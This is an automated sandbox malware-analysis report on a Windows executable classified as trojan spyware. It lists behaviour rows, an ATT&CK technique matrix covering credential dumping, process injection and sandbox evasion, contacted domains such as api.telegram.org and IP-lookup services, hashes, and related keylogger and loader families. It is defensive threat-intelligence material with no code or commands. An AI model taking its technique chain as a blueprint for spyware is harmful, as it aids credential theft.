Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Code function: | 0_2_00405E6B | |
Source: | Code function: | 0_2_00405427 | |
Source: | Code function: | 0_2_00402647 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3894 | ||
Source: | API call chain: | graph_0-3755 |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 1_2_00ADDAC0 |
Source: | Code function: | 0_2_00405E92 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created / APC Queued / Resumed: | Jump to behavior |
Source: | Thread APC queued: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_100010D3 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00405B89 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Software Packing | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
44% | Virustotal | Browse | ||
38% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | Virustotal | Browse | ||
38% | ReversingLabs | Win32.Trojan.Generic | ||
44% | Virustotal | Browse |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
drive.google.com | 172.217.18.14 | true | false | high | |
drive.usercontent.google.com | 142.250.185.193 | true | false | high | |
reallyfreegeoip.org | 104.21.96.1 | true | false | high | |
api.telegram.org | 149.154.167.220 | true | false | high | |
checkip.dyndns.com | 158.101.44.242 | true | false | high | |
checkip.dyndns.org | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.250.185.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false | |
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false | |
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false | |
172.217.18.14 | drive.google.com | United States | 15169 | GOOGLEUS | false | |
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1623448 |
Start date and time: | 2025-02-25 08:25:40 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Balance Pendiente.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/15@5/5 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.67
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target msiexec.exe, PID 5660 because it is empty
- Execution Graph export aborted for target powershell.exe, PID 6964 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
02:26:38 | API Interceptor | |
02:27:41 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | |||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger | Browse | |||
104.21.96.1 | Get hash | malicious | Lokibot | Browse |
| |
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
158.101.44.242 | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | CryptOne, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | MSIL Logger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
checkip.dyndns.com | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| |
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
reallyfreegeoip.org | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| |
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
api.telegram.org | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| |
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
ORACLE-BMC-31898US | Get hash | malicious | Snake Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | CryptOne, MSIL Logger, MassLogger RAT | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse |
| |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GO Backdoor | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | AsyncRAT | Browse |
| ||
Get hash | malicious | AsyncRAT, VenomRAT | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| |
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | GhostRat | Browse |
| |
Get hash | malicious | MSIL Logger, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | AsyncRAT | Browse |
| ||
Get hash | malicious | AsyncRAT, VenomRAT | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | GuLoader | Browse |
| |
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, Remcos | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | Get hash | malicious | GuLoader, Snake Keylogger | Browse | ||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | AgentTesla, GuLoader | Browse |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 53158 |
Entropy (8bit): | 5.062687652912555 |
Encrypted: | false |
SSDEEP: | 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF |
MD5: | 5D430F1344CE89737902AEC47C61C930 |
SHA1: | 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB |
SHA-256: | 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7 |
SHA-512: | DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Balance Pendiente.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6656 |
Entropy (8bit): | 5.028908901377071 |
Encrypted: | false |
SSDEEP: | 96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN |
MD5: | 51E63A9C5D6D230EF1C421B2ECCD45DC |
SHA1: | C499CDAD5C613D71ED3F7E93360F1BBC5748C45D |
SHA-256: | CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F |
SHA-512: | C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522 |
Malicious: | false |
Antivirus: |
|
Joe Sandbox View: | |
Preview: |
